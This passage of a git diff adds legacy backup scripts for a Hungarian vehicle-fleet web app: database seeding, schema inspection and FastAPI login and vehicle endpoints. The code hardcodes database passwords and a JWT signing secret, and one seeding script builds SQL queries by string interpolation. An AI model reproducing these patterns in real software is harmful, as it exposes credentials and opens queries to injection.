""")) + + print("✅ KÉSZ! Kovács János mostantól a csapatod tagja.") + await engine.dispose() + +if __name__ == "__main__": + asyncio.run(hire_driver()) + \ No newline at end of file diff --git a/backend/_legacy_backup/docker-compose.backend.yml b/backend/_legacy_backup/docker-compose.backend.yml new file mode 100755 index 0000000..6f33629 --- /dev/null +++ b/backend/_legacy_backup/docker-compose.backend.yml @@ -0,0 +1,17 @@ +services: + service_finder_api: + build: . + container_name: service_finder_api + env_file: + - .env + networks: + - existing_net + ports: + - "8000:8000" + restart: unless-stopped + +networks: + existing_net: + external: true + name: docker-server_internal_net + diff --git a/backend/_legacy_backup/init_db.py b/backend/_legacy_backup/init_db.py new file mode 100755 index 0000000..bc5f5db --- /dev/null +++ b/backend/_legacy_backup/init_db.py @@ -0,0 +1,81 @@ +import asyncio +import os +from sqlalchemy.ext.asyncio import create_async_engine +from sqlalchemy import text +from dotenv import load_dotenv + +load_dotenv() + +# Cím összeállítása (Ugyanaz a logika, mint a main.py-ban) +raw_url = os.getenv("DATABASE_URL") +if not raw_url: + raw_url = "postgresql://admin:PASSWORD_111@postgres-db:5432/service_finder" +DATABASE_URL = raw_url.replace("postgresql://", "postgresql+asyncpg://").replace("/service_finder_db", "/service_finder") + +async def init_db(): + print(f"🔌 Kapcsolódás ide: {DATABASE_URL}") + engine = create_async_engine(DATABASE_URL) + + async with engine.begin() as conn: + print("🏗️ Séma és Táblák létrehozása...") + + # 1. Séma létrehozása + await conn.execute(text("CREATE SCHEMA IF NOT EXISTS ref;")) + + # 2. Márka tábla + await conn.execute(text(""" + CREATE TABLE IF NOT EXISTS ref.vehicle_makes ( + id SERIAL PRIMARY KEY, + name VARCHAR(100) NOT NULL UNIQUE + ); + """)) + + # 3. Modell tábla + await conn.execute(text(""" + CREATE TABLE IF NOT EXISTS ref.vehicle_models ( + id SERIAL PRIMARY KEY, + make_id INTEGER REFERENCES ref.vehicle_makes(id), + model_name VARCHAR(100) NOT NULL, + category VARCHAR(50) + ); + """)) + + print("🧹 Meglévő adatok törlése (Tiszta lap)...") + await conn.execute(text("TRUNCATE TABLE ref.vehicle_models, ref.vehicle_makes RESTART IDENTITY CASCADE;")) + + print("🚗 Adatok beszúrása...") + + # Adatok + makes = ["BMW", "Audi", "Mercedes-Benz", "Toyota", "Honda", "Suzuki", "Volkswagen"] + + models = [ + ("BMW", "3 Series", "Autó"), ("BMW", "5 Series", "Autó"), ("BMW", "X5", "Autó"), ("BMW", "R 1250 GS", "Motor"), + ("Audi", "A3", "Autó"), ("Audi", "A4", "Autó"), ("Audi", "A6", "Autó"), ("Audi", "Q5", "Autó"), + ("Mercedes-Benz", "C-Class", "Autó"), ("Mercedes-Benz", "E-Class", "Autó"), ("Mercedes-Benz", "S-Class", "Autó"), ("Mercedes-Benz", "G-Class", "Autó"), + ("Toyota", "Corolla", "Autó"), ("Toyota", "Yaris", "Autó"), ("Toyota", "RAV4", "Autó"), ("Toyota", "Hilux", "Autó"), + ("Honda", "Civic", "Autó"), ("Honda", "CR-V", "Autó"), ("Honda", "Africa Twin", "Motor"), ("Honda", "CB500X", "Motor"), + ("Suzuki", "Swift", "Autó"), ("Suzuki", "Vitara", "Autó"), ("Suzuki", "S-Cross", "Autó"), ("Suzuki", "DL 650 V-Strom", "Motor"), + ("Volkswagen", "Golf", "Autó"), ("Volkswagen", "Passat", "Autó"), ("Volkswagen", "Polo", "Autó"), ("Volkswagen", "Tiguan", "Autó") + ] + + # Márkák beszúrása + for make in makes: + await conn.execute(text(f"INSERT INTO ref.vehicle_makes (name) VALUES ('{make}') ON CONFLICT DO NOTHING;")) + + # Modellek beszúrása (kicsit trükkös, mert kell a make_id) + for brand, model, cat in models: + # Megkeressük az ID-t + result = await conn.execute(text(f"SELECT id FROM ref.vehicle_makes WHERE name = '{brand}'")) + make_id = result.scalar() + + # Beszúrjuk a modellt + await conn.execute(text(f""" + INSERT INTO ref.vehicle_models (make_id, model_name, category) + VALUES ({make_id}, '{model}', '{cat}') + """)) + + print("✅ KÉSZ! Az adatbázis feltöltve.") + await engine.dispose() + +if __name__ == "__main__": + asyncio.run(init_db()) diff --git a/backend/_legacy_backup/inspect_db.py b/backend/_legacy_backup/inspect_db.py new file mode 100755 index 0000000..1651cfc --- /dev/null +++ b/backend/_legacy_backup/inspect_db.py @@ -0,0 +1,61 @@ +import asyncio +import os +from sqlalchemy.ext.asyncio import create_async_engine +from sqlalchemy import text +from dotenv import load_dotenv + +load_dotenv() + +# Cím beállítása +raw_url = os.getenv("DATABASE_URL") +if not raw_url: + raw_url = "postgresql://admin:PASSWORD_111@postgres-db:5432/service_finder" +DATABASE_URL = raw_url.replace("postgresql://", "postgresql+asyncpg://").replace("/service_finder_db", "/service_finder") + +async def inspect_schema(): + print(f"🔎 Kapcsolódás az adatbázishoz...") + engine = create_async_engine(DATABASE_URL) + + async with engine.begin() as conn: + # SQL lekérdezés a rendszer katalógusból (information_schema) + # Ez megmondja milyen táblák és oszlopok léteznek + query = text(""" + SELECT + table_schema, + table_name, + column_name, + data_type, + is_nullable + FROM information_schema.columns + WHERE table_schema IN ('public', 'ref', 'data') + ORDER BY table_schema, table_name, ordinal_position; + """) + + result = await conn.execute(query) + rows = result.fetchall() + + if not rows: + print("⚠️ Nem találtam táblákat a 'ref' vagy 'data' sémákban!") + + current_table = "" + for row in rows: + schema = row.table_schema + table = row.table_name + full_table_name = f"{schema}.{table}" + + # Ha új táblához érünk, kiírjuk a nevét + if full_table_name != current_table: + print(f"\n📦 TÁBLA: {full_table_name.upper()}") + print("-" * 50) + print(f"{'OSZLOP NÉV':<20} | {'TÍPUS':<15} | {'KÖTELEZŐ?'}") + print("-" * 50) + current_table = full_table_name + + # Oszlop adatok + req = "IGEN" if row.is_nullable == 'NO' else "nem" + print(f"{row.column_name:<20} | {row.data_type:<15} | {req}") + + await engine.dispose() + +if __name__ == "__main__": + asyncio.run(inspect_schema()) diff --git a/backend/_legacy_backup/inspect_db_full.py b/backend/_legacy_backup/inspect_db_full.py new file mode 100755 index 0000000..98be8b1 --- /dev/null +++ b/backend/_legacy_backup/inspect_db_full.py @@ -0,0 +1,69 @@ +import asyncio +from sqlalchemy import inspect, text +from sqlalchemy.ext.asyncio import create_async_engine + +# CSERÉLD KI a saját adataidra, ha nem ezeket használod! +DATABASE_URL = "postgresql+asyncpg://kincses:MiskociA74@postgres-db:5432/service_finder" + +async def run_inspection(): + # Aszinkron motor létrehozása + engine = create_async_engine(DATABASE_URL) + + async with engine.connect() as conn: + def do_inspect(sync_conn): + inspector = inspect(sync_conn) + + # 1. Sémák lekérése (amiket mi hoztunk létre + public) + target_schemas = ['public', 'data', 'ref'] + all_schemas = inspector.get_schema_names() + schemas_to_check = [s for s in target_schemas if s in all_schemas] + + print(f"{'='*60}") + print(f" JÁRMŰNYILVÁNTARTÓ RENDSZER - ADATBÁZIS AUDIT") + print(f"{'='*60}") + + for schema in schemas_to_check: + print(f"\n--- SÉMA: {schema.upper()} ---") + tables = inspector.get_table_names(schema=schema) + + if not tables: + print(" (Nincsenek táblák ebben a sémában)") + continue + + for table_name in tables: + print(f"\n[Tábla: {schema}.{table_name}]") + + # Oszlopok részletei + columns = inspector.get_columns(table_name, schema=schema) + for col in columns: + pk = " [PK]" if col['primary_key'] else "" + nullable = "NULL" if col['nullable'] else "NOT NULL" + print(f" L {col['name']:<15} | {str(col['type']):<12} | {nullable}{pk}") + + # Idegen kulcsok (Kapcsolatok) + fks = inspector.get_foreign_keys(table_name, schema=schema) + for fk in fks: + constrained = fk['constrained_columns'] + referred_schema = fk['referred_schema'] + referred_table = fk['referred_table'] + referred_cols = fk['referred_columns'] + print(f" --> Kapcsolat: {constrained} -> {referred_schema}.{referred_table}({referred_cols})") + + # Mivel az SQLAlchemy inspector alapvetően szinkron, run_sync-et használunk + await conn.run_sync(do_inspect) + + # 2. Extra: Kiterjesztések ellenőrzése + print(f"\n{'='*60}") + print(" AKTÍV POSTGRESQL KITERJESZTÉSEK:") + result = await conn.execute(text("SELECT extname FROM pg_extension;")) + for row in result: + print(f" - {row[0]}") + print(f"{'='*60}") + + await engine.dispose() + +if __name__ == "__main__": + try: + asyncio.run(run_inspection()) + except Exception as e: + print(f"HIBA TÖRTÉNT: {e}") diff --git a/backend/_legacy_backup/main.py b/backend/_legacy_backup/main.py new file mode 100755 index 0000000..bc8f551 --- /dev/null +++ b/backend/_legacy_backup/main.py @@ -0,0 +1,81 @@ +from fastapi import FastAPI, HTTPException, Form, Depends +from fastapi.responses import FileResponse, JSONResponse +from fastapi.security import OAuth2PasswordBearer, OAuth2PasswordRequestForm +from pydantic import BaseModel +from sqlalchemy.ext.asyncio import create_async_engine, AsyncSession +from sqlalchemy.orm import sessionmaker +from sqlalchemy import text +from datetime import datetime, timedelta, date +from jose import jwt +import bcrypt, os, traceback +from dotenv import load_dotenv + +load_dotenv() + +SECRET_KEY = "SZUPER_TITKOS_KULCS_2026" +ALGORITHM = "HS256" +oauth2_scheme = OAuth2PasswordBearer(tokenUrl="api/auth/login") +DATABASE_URL = os.getenv("DATABASE_URL", "").replace("postgresql://", "postgresql+asyncpg://") +engine = create_async_engine(DATABASE_URL, pool_pre_ping=True) +AsyncSessionLocal = sessionmaker(engine, class_=AsyncSession, expire_on_commit=False) + +app = FastAPI() + +# --- AUTH --- +def get_password_hash(p): return bcrypt.hashpw(p.encode('utf-8')[:72], bcrypt.gensalt()).decode('utf-8') +def verify_password(p, h): return bcrypt.checkpw(p.encode('utf-8')[:72], h.encode('utf-8')) + +async def get_current_user(token: str = Depends(oauth2_scheme)): + try: + p = jwt.decode(token, SECRET_KEY, algorithms=[ALGORITHM]) + return int(p.get("sub")) + except: raise HTTPException(status_code=401) + +@app.post("/api/auth/register") +async def register(email: str = Form(...), password: str = Form(...)): + try: + async with AsyncSessionLocal() as session: + async with session.begin(): + await session.execute(text("INSERT INTO data.users (email, password_hash) VALUES (:e, :p)"), + {"e": email, "p": get_password_hash(password)}) + return {"status": "success"} + except Exception as e: + return JSONResponse(status_code=400, content={"detail": "Email már létezik vagy adatbázis hiba."}) + +@app.post("/api/auth/login") +async def login(f: OAuth2PasswordRequestForm = Depends()): + async with AsyncSessionLocal() as session: + res = await session.execute(text("SELECT id, password_hash FROM data.users WHERE email = :e"), {"e": f.username}) + u = res.fetchone() + if not u or not verify_password(f.password, u.password_hash): raise HTTPException(status_code=401, detail="Hibás adatok") + t = jwt.encode({"sub": str(u.id), "exp": datetime.utcnow() + timedelta(days=1)}, SECRET_KEY, algorithm=ALGORITHM) + return {"access_token": t, "token_type": "bearer"} + +# --- DATA --- +@app.get("/api/meta/vehicle-hierarchy") +async def get_hierarchy(): + async with AsyncSessionLocal() as session: + q = text("SELECT vm.category, m.name as brand, vm.id as model_id, vm.model_name FROM ref.vehicle_models vm JOIN ref.vehicle_makes m ON vm.make_id = m.id ORDER BY vm.category, m.name") + res = await session.execute(q) + h = {} + for r in res: + if r.category not in h: h[r.category] = {} + if r.brand not in h[r.category]: h[r.category][r.brand] = [] + h[r.category][r.brand].append({"id": r.model_id, "name": r.model_name}) + return h + +@app.get("/api/meta/cost-types") +async def get_cost_types(): + async with AsyncSessionLocal() as session: + res = await session.execute(text("SELECT code, name FROM ref.cost_types ORDER BY name")) + return {r.code: r.name for r in res.fetchall()} + +@app.get("/api/my_vehicles") +async def my_vehicles(uid: int = Depends(get_current_user)): + async with AsyncSessionLocal() as session: + q = text("SELECT v.id as vehicle_id, v.current_plate as plate, m.name as brand, mo.model_name as model, v.status FROM data.vehicle_history vh JOIN data.vehicles v ON vh.vehicle_id = v.id JOIN ref.vehicle_models mo ON v.model_id = mo.id JOIN ref.vehicle_makes m ON mo.make_id = m.id WHERE vh.user_id = :uid AND vh.end_date IS NULL") + res = await session.execute(q, {"uid": uid}) + return [dict(r._mapping) for r in res.fetchall()] + +@app.get("/") +async def index(): return FileResponse("/app/frontend/index.html") \ No newline at end of file diff --git a/backend/_legacy_backup/main_2.py b/backend/_legacy_backup/main_2.py new file mode 100755 index 0000000..a6c5497 --- /dev/null +++ b/backend/_legacy_backup/main_2.py @@ -0,0 +1,120 @@ +from fastapi import FastAPI, HTTPException +from fastapi.staticfiles import StaticFiles +from fastapi.responses import FileResponse +from pydantic import BaseModel, validator +from typing import Optional +from sqlalchemy.ext.asyncio import create_async_engine, AsyncSession +from sqlalchemy.orm import sessionmaker +from sqlalchemy import text +import os +from datetime import date +from dotenv import load_dotenv + +load_dotenv() + +# --- 1. ADATBÁZIS KAPCSOLAT --- +raw_url = os.getenv("DATABASE_URL") +if not raw_url: + raw_url = "postgresql://admin:PASSWORD_111@postgres-db:5432/service_finder" +fixed_url = raw_url.replace("postgresql://", "postgresql+asyncpg://").replace("/service_finder_db", "/service_finder") + +engine = create_async_engine(fixed_url) +AsyncSessionLocal = sessionmaker(engine, class_=AsyncSession, expire_on_commit=False) + +app = FastAPI(title="Service Finder API") + +# --- 2. ADATMODELLEK (VALIDÁCIÓVAL) --- +class VehicleRegister(BaseModel): + model_id: int + vin: str # Alvázszám (KÖTELEZŐ!) + plate: str # Rendszám + mileage: int # Km óra + purchase_date: date + role: str = "OWNER" # Alapértelmezett: Tulajdonos + + # Adatőr: Automatikus nagybetűsítés és tisztítás + @validator('vin') + def clean_vin(cls, v): + if len(v) < 5: raise ValueError('Az alvázszám túl rövid!') + return v.upper().replace("-", "").replace(" ", "") + + @validator('plate') + def clean_plate(cls, v): + return v.upper().replace("-", "").replace(" ", "") + + @validator('mileage') + def positive_mileage(cls, v): + if v < 0: raise ValueError('A kilométer nem lehet negatív!') + return v + +# --- 3. VÉGPONTOK --- + +# Lista lekérése (Katalógus) +@app.get("/api/vehicles") +async def get_vehicles(): + async with AsyncSessionLocal() as session: + result = await session.execute(text(""" + SELECT vm.id, m.name as brand, vm.model_name, vm.category + FROM ref.vehicle_models vm + JOIN ref.vehicle_makes m ON vm.make_id = m.id + ORDER BY m.name, vm.model_name + """)) + return [{"id": r.id, "brand": r.brand, "model": r.model_name, "category": r.category} for r in result.fetchall()] + +# ÚJ: JÁRMŰ REGISZTRÁCIÓ (A Nagy Logika) +@app.post("/api/register") +async def register_vehicle(data: VehicleRegister): + async with AsyncSessionLocal() as session: + async with session.begin(): # Tranzakció indítása + try: + # 1. Megnézzük, létezik-e már ez a VAS (Alvázszám alapján)? + check_query = text("SELECT id FROM data.vehicles WHERE vin = :vin") + result = await session.execute(check_query, {"vin": data.vin}) + existing_car_id = result.scalar() + + vehicle_id = existing_car_id + + # 2. HA NEM LÉTEZIK -> Létrehozzuk a VASAT + if not vehicle_id: + print(f"🆕 Új autó az adatbázisban: {data.vin}") + insert_car = text(""" + INSERT INTO data.vehicles (model_id, vin, current_plate) + VALUES (:mid, :vin, :plt) + RETURNING id + """) + res = await session.execute(insert_car, { + "mid": data.model_id, "vin": data.vin, "plt": data.plate + }) + vehicle_id = res.scalar() + else: + print(f"♻️ Létező autó átvétele: {data.vin} (ID: {vehicle_id})") + # Itt később lezárhatjuk az előző tulajdonos history-ját! + + # 3. BEJEGYZÉS A TÖRTÉNELEMBE (HISTORY) + # Ez köti össze a User-t (most fixen ID=1) az Autóval + insert_history = text(""" + INSERT INTO data.vehicle_history + (vehicle_id, user_id, role, start_date, start_mileage) + VALUES (:vid, 1, :role, :s_date, :s_mil) + """) + + await session.execute(insert_history, { + "vid": vehicle_id, + "role": data.role, + "s_date": data.purchase_date, + "s_mil": data.mileage + }) + + return {"status": "success", "message": "Jármű sikeresen rögzítve a flottában!"} + + except Exception as e: + print(f"❌ Hiba: {e}") + raise HTTPException(status_code=500, detail=str(e)) + +# Frontend kiszolgálása +@app.get("/") +async def serve_frontend(): + if os.path.exists("/app/frontend/index.html"): + return FileResponse("/app/frontend/index.html") + return {"error": "Frontend hiányzik"} + diff --git a/backend/_legacy_backup/main_final.py b/backend/_legacy_backup/main_final.py new file mode 100755 index 0000000..a6397c9 --- /dev/null +++ b/backend/_legacy_backup/main_final.py @@ -0,0 +1,49 @@ +from fastapi import FastAPI +from sqlalchemy.ext.asyncio import create_async_engine, AsyncSession +from sqlalchemy.orm import sessionmaker +from sqlalchemy import text +import os +from dotenv import load_dotenv + +load_dotenv() + +app = FastAPI(title="Service Finder API") + +# --- A DUPLA JAVÍTÁS --- +raw_url = os.getenv("DATABASE_URL") + +if not raw_url: + # Vészhelyzeti fallback (ha nem lenne .env) + raw_url = "postgresql://admin:PASSWORD_111@postgres-db:5432/service_finder" + +# 1. Javítás: Driver csere (asyncpg) +fixed_url = raw_url.replace("postgresql://", "postgresql+asyncpg://") + +# 2. Javítás: Adatbázis név csere (Ha véletlenül _db a vége, levágjuk) +fixed_url = fixed_url.replace("/service_finder_db", "/service_finder") + +print(f"🔧 VÉGLEGES ADATBÁZIS CÍM: {fixed_url}") + +# Kapcsolódás a javított címmel +engine = create_async_engine(fixed_url) +AsyncSessionLocal = sessionmaker(engine, class_=AsyncSession, expire_on_commit=False) + +@app.get("/") +async def root(): + return {"message": "Service Finder API működik! 🚀"} + +@app.get("/vehicles") +async def get_vehicles(): + async with AsyncSessionLocal() as session: + try: + query = text(""" + SELECT m.name as brand, vm.model_name, vm.category + FROM ref.vehicle_models vm + JOIN ref.vehicle_makes m ON vm.make_id = m.id + ORDER BY m.name, vm.model_name + """) + result = await session.execute(query) + vehicles = result.fetchall() + return [{"brand": r.brand, "model": r.model_name, "category": r.category} for r in vehicles] + except Exception as e: + return {"error": str(e)} diff --git a/backend/_legacy_backup/main_fixed.py b/backend/_legacy_backup/main_fixed.py new file mode 100755 index 0000000..ce52bb0 --- /dev/null +++ b/backend/_legacy_backup/main_fixed.py @@ -0,0 +1,52 @@ +from fastapi import FastAPI +from sqlalchemy.ext.asyncio import create_async_engine, AsyncSession +from sqlalchemy.orm import sessionmaker +from sqlalchemy import text +import os +from dotenv import load_dotenv + +# Betöltjük a környezeti változókat +load_dotenv() + +app = FastAPI(title="Service Finder API") + +# --- A FIX --- +# Kiolvassuk a címet +raw_url = os.getenv("DATABASE_URL") + +# Ha nincs beállítva, adunk egy vészhelyzeti alapértelmezettet +if not raw_url: + print("⚠️ FIGYELEM: Nincs DATABASE_URL, alapértelmezett használata!") + # Itt a konténer belső nevét (postgres-db) használjuk + raw_url = "postgresql://admin:MiskociA74@postgres-db:5432/service_finder" + +# A LÉNYEG: Ha hiányzik az '+asyncpg', hozzáadjuk! +if "asyncpg" not in raw_url: + DATABASE_URL = raw_url.replace("postgresql://", "postgresql+asyncpg://") + print(f"🔧 URL javítva erre: {DATABASE_URL}") +else: + DATABASE_URL = raw_url + +# Motor indítása a javított URL-lel +engine = create_async_engine(DATABASE_URL) +AsyncSessionLocal = sessionmaker(engine, class_=AsyncSession, expire_on_commit=False) + +@app.get("/") +async def root(): + return {"message": "Service Finder API működik! 🚀"} + +@app.get("/vehicles") +async def get_vehicles(): + async with AsyncSessionLocal() as session: + try: + query = text(""" + SELECT m.name as brand, vm.model_name, vm.category + FROM ref.vehicle_models vm + JOIN ref.vehicle_makes m ON vm.make_id = m.id + ORDER BY m.name, vm.model_name + """) + result = await session.execute(query) + vehicles = result.fetchall() + return [{"brand": r.brand, "model": r.model_name, "category": r.category} for r in vehicles] + except Exception as e: + return {"error": str(e)} diff --git a/backend/_legacy_backup/migrate_ref_data.py b/backend/_legacy_backup/migrate_ref_data.py new file mode 100755 index 0000000..ec50041 --- /dev/null +++ b/backend/_legacy_backup/migrate_ref_data.py @@ -0,0 +1,71 @@ +import asyncio +import os +from sqlalchemy.ext.asyncio import create_async_engine +from sqlalchemy import text +from dotenv import load_dotenv + +load_dotenv() + +raw_url = os.getenv("DATABASE_URL") +if not raw_url: + raw_url = "postgresql://admin:PASSWORD_111@postgres-db:5432/service_finder" +DATABASE_URL = raw_url.replace("postgresql://", "postgresql+asyncpg://").replace("/service_finder_db", "/service_finder") + +async def seed_cost_types(): + engine = create_async_engine(DATABASE_URL) + async with engine.begin() as conn: + print("🔨 Költség típusok tábla létrehozása...") + await conn.execute(text(""" + CREATE TABLE IF NOT EXISTS ref.cost_types ( + code VARCHAR(50) PRIMARY KEY, + name VARCHAR(100) NOT NULL, + parent_code VARCHAR(50) REFERENCES ref.cost_types(code), -- Hierarchia! + is_active BOOLEAN DEFAULT TRUE, + sort_order INTEGER DEFAULT 0 + ); + """)) + + print("📥 Adatok feltöltése...") + # Először a szülők (Főkategóriák) + parents = [ + ('FUEL', '⛽ Tankolás', 10), + ('PURCHASE', '💰 Beszerzés / Pénzügy', 20), + ('INSURANCE', '📄 Biztosítás', 30), + ('TAX', '🏛️ Adó / Illeték', 40), + ('SERVICE', '🔧 Szerviz', 50), + ('OTHER', 'Egyéb', 99) + ] + for p in parents: + await conn.execute(text("INSERT INTO ref.cost_types (code, name, sort_order) VALUES (:c, :n, :s) ON CONFLICT (code) DO NOTHING"), {"c": p[0], "n": p[1], "s": p[2]}) + + # Aztán a gyerekek (Alkategóriák) + children = [ + # Beszerzés + ('PURCHASE_PRICE', 'Vételár', 'PURCHASE'), + ('FINANCE_LEASE', 'Lízing díj', 'PURCHASE'), + ('FINANCE_LOAN', 'Hitel törlesztő', 'PURCHASE'), + ('IMPORT_FEE', 'Honosítás / Regadó', 'PURCHASE'), + # Biztosítás + ('INSURANCE_KGFB', 'Kötelező (KGFB)', 'INSURANCE'), + ('INSURANCE_CASCO', 'Casco', 'INSURANCE'), + ('INSURANCE_GAP', 'GAP', 'INSURANCE'), + ('INSURANCE_ASSIST', 'Assistance', 'INSURANCE'), + # Adó + ('TAX_WEIGHT', 'Gépjárműadó (Súlyadó)', 'TAX'), + ('TAX_COMPANY', 'Cégautóadó', 'TAX'), + ('TAX_TRANSFER', 'Vagyonszerzési illeték', 'TAX'), + ('TAX_OTHER', 'Egyéb adó', 'TAX'), + # Szerviz + ('SERVICE_MAINTENANCE', 'Kötelező karbantartás', 'SERVICE'), + ('SERVICE_REPAIR', 'Javítás', 'SERVICE'), + ('SERVICE_TIRE', 'Gumicsere', 'SERVICE'), + ('SERVICE_MOT', 'Műszaki vizsga', 'SERVICE') + ] + for c in children: + await conn.execute(text("INSERT INTO ref.cost_types (code, name, parent_code) VALUES (:c, :n, :p) ON CONFLICT (code) DO NOTHING"), {"c": c[0], "n": c[1], "p": c[2]}) + + print("✅ KÉSZ! A tudás most már az adatbázisban van, nem a HTML-ben.") + await engine.dispose() + +if __name__ == "__main__": + asyncio.run(seed_cost_types()) \ No newline at end of file diff --git a/backend/_legacy_backup/teszt.txt b/backend/_legacy_backup/teszt.txt new file mode 100755 index 0000000..e69de29 diff --git a/backend/_legacy_backup/update_audit_system.py b/backend/_legacy_backup/update_audit_system.py new file mode 100755 index 0000000..271eff7 --- /dev/null +++ b/backend/_legacy_backup/update_audit_system.py @@ -0,0 +1,46 @@ +import asyncio +import os +from sqlalchemy.ext.asyncio import create_async_engine +from sqlalchemy import text +from dotenv import load_dotenv + +load_dotenv() + +raw_url = os.getenv("DATABASE_URL") +if not raw_url: + raw_url = "postgresql://admin:PASSWORD_111@postgres-db:5432/service_finder" +DATABASE_URL = raw_url.replace("postgresql://", "postgresql+asyncpg://").replace("/service_finder_db", "/service_finder") + +async def build_audit_system(): + engine = create_async_engine(DATABASE_URL) + + async with engine.begin() as conn: + print("📜 Audit Log tábla létrehozása...") + # Ez a tábla sosem töröl, csak ír! (Append-only) + await conn.execute(text(""" + CREATE TABLE IF NOT EXISTS data.audit_logs ( + id SERIAL PRIMARY KEY, + user_id INTEGER REFERENCES data.users(id), -- KI csinálta? + event_type VARCHAR(50) NOT NULL, -- MIT? (pl. ISSUE_REPORT, MILEAGE_UPDATE) + target_id INTEGER, -- MELYIK autón? (Vehicle ID) + old_value TEXT, -- MI volt előtte? (A visszaállításhoz) + new_value TEXT, -- MI lett utána? + details TEXT, -- Egyéb megjegyzés (pl. hiba leírása) + ip_address VARCHAR(45), -- Honnan? (Biztonság) + created_at TIMESTAMP DEFAULT NOW() + ); + """)) + + print("🚦 Jármű Státusz mezők hozzáadása...") + # Bővítjük a járműveket, hogy tárolják a hibát + await conn.execute(text(""" + ALTER TABLE data.vehicles + ADD COLUMN IF NOT EXISTS status VARCHAR(20) DEFAULT 'OK', -- OK, WARNING, CRITICAL + ADD COLUMN IF NOT EXISTS current_issue TEXT; -- A hiba leírása + """)) + + print("✅ KÉSZ! A mindent látó szem (Audit Log) aktív.") + await engine.dispose() + +if __name__ == "__main__": + asyncio.run(build_audit_system()) \ No newline at end of file diff --git a/backend/_legacy_backup/update_cost_categories.py b/backend/_legacy_backup/update_cost_categories.py new file mode 100755 index 0000000..cda5b6c --- /dev/null +++ b/backend/_legacy_backup/update_cost_categories.py @@ -0,0 +1,56 @@ +import asyncio +import os +from sqlalchemy.ext.asyncio import create_async_engine +from sqlalchemy import text +from dotenv import load_dotenv + +load_dotenv() + +raw_url = os.getenv("DATABASE_URL") +if not raw_url: + raw_url = "postgresql://admin:PASSWORD_111@postgres-db:5432/service_finder" +DATABASE_URL = raw_url.replace("postgresql://", "postgresql+asyncpg://").replace("/service_finder_db", "/service_finder") + +async def expand_categories(): + engine = create_async_engine(DATABASE_URL) + async with engine.begin() as conn: + print("📥 Új Főkategóriák beszúrása...") + parents = [ + ('EQUIPMENT', '🛠️ Felszerelés / Extrák', 25), # Vételár után + ('OPERATIONAL', '🅿️ Üzemeltetés / Út', 15), # Tankolás után + ('FINE', '👮 Bírság / Büntetés', 90) + ] + for p in parents: + await conn.execute(text("INSERT INTO ref.cost_types (code, name, sort_order) VALUES (:c, :n, :s) ON CONFLICT (code) DO NOTHING"), {"c": p[0], "n": p[1], "s": p[2]}) + + print("📥 Új Alkategóriák beszúrása...") + children = [ + # Felszerelés (EQUIPMENT) + ('EQUIP_SHELVING', 'Raktérburkolat / Polcrendszer', 'EQUIPMENT'), + ('EQUIP_BRANDING', 'Matricázás / Fóliázás', 'EQUIPMENT'), + ('EQUIP_TOWBAR', 'Vonóhorog / Tetőcsomagtartó', 'EQUIPMENT'), + ('EQUIP_SAFETY', 'Kötelező tartozékok (Eü. csomag)', 'EQUIPMENT'), + ('EQUIP_GPS', 'GPS / Nyomkövető hardver', 'EQUIPMENT'), + ('EQUIP_WINTER_TIRE', 'Téli gumi szett (Beszerzés)', 'EQUIPMENT'), + + # Üzemeltetés (OPERATIONAL) + ('OP_PARKING', 'Parkolás', 'OPERATIONAL'), + ('OP_TOLL', 'Útdíj / Matrica / Behajtás', 'OPERATIONAL'), + ('OP_WASH', 'Mosás / Kozmetika', 'OPERATIONAL'), + ('OP_ADBLUE', 'AdBlue', 'OPERATIONAL'), + ('OP_EV_CHARGE', 'Elektromos töltés', 'OPERATIONAL'), + ('OP_STORAGE', 'Gumi hotel / Tárolás', 'OPERATIONAL'), + + # Bírság (FINE) + ('FINE_SPEEDING', 'Gyorshajtás', 'FINE'), + ('FINE_PARKING', 'Parkolási bírság', 'FINE'), + ('FINE_ADMIN', 'Közigazgatási bírság', 'FINE') + ] + for c in children: + await conn.execute(text("INSERT INTO ref.cost_types (code, name, parent_code) VALUES (:c, :n, :p) ON CONFLICT (code) DO NOTHING"), {"c": c[0], "n": c[1], "p": c[2]}) + + print("✅ KÉSZ! A költséglista most már teljeskörű.") + await engine.dispose() + +if __name__ == "__main__": + asyncio.run(expand_categories()) \ No newline at end of file diff --git a/backend/_legacy_backup/update_db_i18n.py b/backend/_legacy_backup/update_db_i18n.py new file mode 100755 index 0000000..e8b8137 --- /dev/null +++ b/backend/_legacy_backup/update_db_i18n.py @@ -0,0 +1,46 @@ +import asyncio +import os +from sqlalchemy.ext.asyncio import create_async_engine +from sqlalchemy import text +from dotenv import load_dotenv + +load_dotenv() + +raw_url = os.getenv("DATABASE_URL") +if not raw_url: + raw_url = "postgresql://admin:PASSWORD_111@postgres-db:5432/service_finder" +DATABASE_URL = raw_url.replace("postgresql://", "postgresql+asyncpg://").replace("/service_finder_db", "/service_finder") + +async def upgrade_db(): + print(f"🔌 Kapcsolódás...") + engine = create_async_engine(DATABASE_URL) + + async with engine.begin() as conn: + print("🌍 Felhasználói tábla bővítése (Ország + Alapértelmezett pénznem)...") + # 1. Users tábla bővítése + await conn.execute(text(""" + ALTER TABLE data.users + ADD COLUMN IF NOT EXISTS country VARCHAR(2) DEFAULT 'HU', + ADD COLUMN IF NOT EXISTS default_currency VARCHAR(3) DEFAULT 'HUF'; + """)) + + print("💶 Költség tábla bővítése (Tranzakciós pénznem)...") + # 2. Costs tábla bővítése + await conn.execute(text(""" + ALTER TABLE data.costs + ADD COLUMN IF NOT EXISTS currency VARCHAR(3) DEFAULT 'HUF'; + """)) + + # Frissítjük a meglévő Demo Usert (ID=1) + print("👤 Demo User beállítása: Magyarország / HUF") + await conn.execute(text(""" + UPDATE data.users + SET country = 'HU', default_currency = 'HUF' + WHERE id = 1; + """)) + + print("✅ KÉSZ! Az adatbázis mostantól támogatja a több pénznemet.") + await engine.dispose() + +if __name__ == "__main__": + asyncio.run(upgrade_db()) diff --git a/backend/_legacy_backup/update_docs.py b/backend/_legacy_backup/update_docs.py new file mode 100755 index 0000000..0ff9347 --- /dev/null +++ b/backend/_legacy_backup/update_docs.py @@ -0,0 +1,26 @@ +import asyncio +import os +from sqlalchemy.ext.asyncio import create_async_engine +from sqlalchemy import text +from dotenv import load_dotenv + +load_dotenv() + +raw_url = os.getenv("DATABASE_URL") +if not raw_url: + raw_url = "postgresql://admin:PASSWORD_111@postgres-db:5432/service_finder" +DATABASE_URL = raw_url.replace("postgresql://", "postgresql+asyncpg://").replace("/service_finder_db", "/service_finder") + +async def add_doc_column(): + engine = create_async_engine(DATABASE_URL) + async with engine.begin() as conn: + print("📄 Dokumentum oszlop hozzáadása a Costs táblához...") + await conn.execute(text(""" + 